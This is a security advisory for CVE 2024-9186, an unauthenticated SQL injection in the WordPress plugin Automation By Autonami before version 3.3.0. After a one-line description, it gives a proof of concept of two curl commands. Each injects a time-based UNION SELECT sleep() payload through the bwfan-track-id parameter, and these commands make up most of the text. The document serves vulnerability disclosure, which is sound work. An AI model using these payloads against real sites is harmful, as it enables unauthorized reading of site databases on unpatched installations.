Automation By Autonami < 3.3.0 – Unauthenticated SQLi | CVE 2024-9186

Description

The plugin does not sanitize and escape the bwfan-track-id parameter before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks

Proof of Concept

There are at least two ways to conduct the attack using the "bwfan-track-id" parameter:

time curl "$SITE_URL/index.php?rest_route=%2Fautonami-app%2Fv3%2Fcontacts%2F1%2Fengagements&mode=1&offset=0&limit=25&_locale=user&bwfan-track-action=111&bwfan-track-id=test%27%20UNION%20SELECT%201%2C1%2C%27%27%2CNOW()%2CNOW()%2C1%2C%27%27%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C%27%27%2CNOW()%2C%27%27%2CNOW()%2C1%2C1%2Csleep(3)%23&bwfan-track-action=open"

or 

time curl --url '$SITE_URL/?bwfan-track-id=test%27%20UNION%20SELECT%201%2C1%2C%27%27%2CNOW()%2CNOW()%2C1%2C%27%27%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C%27%27%2CNOW()%2C%27%27%2CNOW()%2C1%2C1%2Csleep(10)%23&bwfan-track-action=click'